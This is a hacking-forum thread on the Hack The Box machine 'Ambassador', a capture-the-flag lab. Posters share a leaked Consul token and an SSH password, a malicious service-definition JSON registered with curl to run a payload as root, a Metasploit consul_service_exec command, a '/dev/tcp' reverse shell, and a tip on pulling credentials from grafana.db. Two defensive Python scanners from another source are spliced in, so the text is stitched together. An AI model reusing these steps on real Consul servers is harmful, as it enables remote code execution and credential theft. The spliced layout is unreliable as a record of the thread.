Ambassador - HTB [Discussion]
(October 2, 2022, 12:38 AM)coder1777 Wrote:
(October 2, 2022, 12:18 AM)echo133t Wrote:
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

How did you get the token?


developer@ambassador:/opt/my-app$ git diff c982db8eff6f10f8f3a7d802f79f2705e7a21b55

Reply
(October 2, 2022, 12:11 AM)GreyEVO Wrote: Root is with Consul Agent API, you can find an exploit on GitHub but you have to modify a few things
And you need a token to interact with the API, which you can find in a .git commit diff somewhere on the machine (can't remember where)


link exploit pls? :D

(October 2, 2022, 12:38 AM)coder1777 Wrote:
(October 2, 2022, 12:18 AM)echo133t Wrote:
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

How did you get the token?


cd /opt/my-app
git show 
letter in red.
Reply
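The token in the posts above came out of the repository's commit history, so a defender's check has to read diffs, not just the current files. The following is an added example, not code from the thread: it scans `git log -p` output for Consul tokens on added and removed lines; the sample log, file name, key path and token are constructed.

```python
import re

# Consul ACL tokens are UUID-shaped; match one only where it is used as a token.
TOKEN_RE = re.compile(
    r"(?:--?token[= ]|X-Consul-Token:\s*|CONSUL_HTTP_TOKEN=)[\"']?"
    r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.I)

# Constructed `git log -p` output: the token was removed from the working tree
# by this commit, yet the "-" line keeps it readable in history.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
    tidy config script

diff --git a/deploy.sh b/deploy.sh
--- a/deploy.sh
+++ b/deploy.sh
@@ -1,2 +1,2 @@
 # export MYSQL_PASSWORD before running
-consul kv put --token 00000000-aaaa-4bbb-8ccc-000000000000 app/db/mysql_pw $MYSQL_PASSWORD
+consul kv put app/db/mysql_pw $MYSQL_PASSWORD
"""


def find_leaked_tokens(log_text):
    """Return (commit, path, 'added'|'removed', redacted_token) per hit."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith(("--- ", "+++ ")):
            name = line[4:]
            if name != "/dev/null":
                path = name[2:] if name[:2] in ("a/", "b/") else name
        elif line[:1] in ("+", "-"):
            match = TOKEN_RE.search(line)
            if match:
                state = "added" if line[0] == "+" else "removed"
                findings.append((commit, path, state, match.group(1)[:8] + "-****"))
    return findings


if __name__ == "__main__":
    for hit in find_leaked_tokens(SAMPLE_LOG):
        print(hit)
```

A "removed" hit means the token is gone from the working tree but still recoverable from history, so the token has to be rotated rather than only deleted.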
For root create a service config file for consul like:

exp.json:
{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}

Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register

Reply
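The registration in the post above only runs a command if the agent accepts script checks over its HTTP API, which Consul controls with `enable_script_checks` and `enable_local_script_checks`. The following is an added example, not code from the thread: it audits a service definition for command-executing checks and models, as an assumption based on Consul's documented behaviour, how a weak and a hardened agent setting would treat it; the agent settings are constructed and the definition is the exp.json from the post.

```python
import json

RISKY_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable locations

# Service definition as posted in the thread (exp.json).
THREAD_DEFINITION = json.loads("""
{"name": "pwn", "tags": ["default"],
 "checks": [{"CheckId": "lol", "name": "lol", "args": ["/tmp/test.sh"],
             "interval": "10s", "timeout": "1s"}]}
""")

# Constructed agent settings: the weak one beside the corrected one.
WEAK_AGENT = {"enable_script_checks": True}
HARDENED_AGENT = {"enable_script_checks": False, "enable_local_script_checks": True}


def api_script_checks_allowed(agent_cfg):
    """True when checks registered over the HTTP API may run commands."""
    return bool(agent_cfg.get("enable_script_checks", False))


def audit_definition(defn):
    """Return (check_id, argv, reason) for each check that executes a command."""
    findings = []
    checks = list(defn.get("checks", []))
    if "check" in defn:
        checks.append(defn["check"])
    for chk in checks:
        c = {k.lower(): v for k, v in chk.items()}  # key case varies in practice
        argv = c.get("args") or []
        if not argv:
            continue  # no argv: nothing is executed on the agent host
        reason = "script check"
        if any(str(a).startswith(RISKY_DIRS) for a in argv):
            reason = "script check running a file from a world-writable directory"
        findings.append((c.get("checkid") or c.get("id") or c.get("name"), argv, reason))
    return findings


def verdict(agent_cfg, defn):
    """Model what an API registration of this definition would lead to."""
    if not audit_definition(defn):
        return "ok"
    return "would execute" if api_script_checks_allowed(agent_cfg) else "refused over API"


if __name__ == "__main__":
    print(audit_definition(THREAD_DEFINITION))
    print(verdict(WEAK_AGENT, THREAD_DEFINITION), "/", verdict(HARDENED_AGENT, THREAD_DEFINITION))
```

With `enable_local_script_checks`, script checks still work when defined in the agent's own configuration files, so legitimate health scripts keep running while API callers holding a token cannot add new ones.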
Metasploit version for Root

1. SSH Portforwarding 8500: ( Change Machine_IP )

ssh -L 8500:0.0.0.0:8500 developer@Machine_IP


password: anEnglishManInNewYork027468

2. Open new shell and enter this command: ( Change Your_IP )

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"
Reply
(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:
{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}


Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register


Which payload do I have to put in test.sh? Can you please explain simply and briefly?
Reply
how did you find mysql password?
Reply
ambassador writeup 

https://malw0re.gitbook.io/notes/hackthebox/ambassador
Reply
ytytyy
Reply
(October 2, 2022, 10:12 AM)angadrathee Wrote:
(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:
{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}


Put your payload to /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register


Which payload do I have to put in test.sh? Can you please explain simply and briefly?


Payload is a reverse shell. For example:
sh -i >& /dev/tcp/10.10.10.10/9001 0>&1


(October 2, 2022, 01:38 PM)Enemigosss2 Wrote: how did you find mysql password?

grafana.db is a useful file, located at /var/lib/grafana/grafana.db
See: https://stackoverflow.com/a/65861668

If you examine it with sqlite3, you will find creds
Reply
(October 2, 2022, 02:12 AM)echo133t Wrote: Metasploit version for Root

1. SSH Portforwarding 8500: ( Change Machine_IP )

ssh -L 8500:0.0.0.0:8500 developer@Machine_IP


password: anEnglishManInNewYork027468

2. Open new shell and enter this command: ( Change Your_IP )

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"


Why does it say
lport => 4444
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*]Exploit completed, but no session was created.


(October 2, 2022, 02:12 AM)echo133t Wrote: Metasploit version for Root

1. SSH Portforwarding 8500: ( Change Machine_IP )

ssh -L 8500:0.0.0.0:8500 developer@Machine_IP


password: anEnglishManInNewYork027468

2. Open new shell and enter this command: ( Change Your_IP )

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"


Forgot to change my IP, but now it says

[-] Handler failed to bind to 10.10.14.45:9002:-  -
[*] Started reverse TCP handler on 0.0.0.0:9002
[*]Creating service 'YolTTi'
[*]Service 'YolTTi' successfully created.
[*]Waiting for service 'YolTTi' script to trigger
[*]Removing service 'YolTTi'
[*]Command Stager progress - 100.00% done (763/763 bytes)
[*]Exploit completed, but no session was created.
msf6 exploit(multi/misc/consul_service_exec) >
Reply

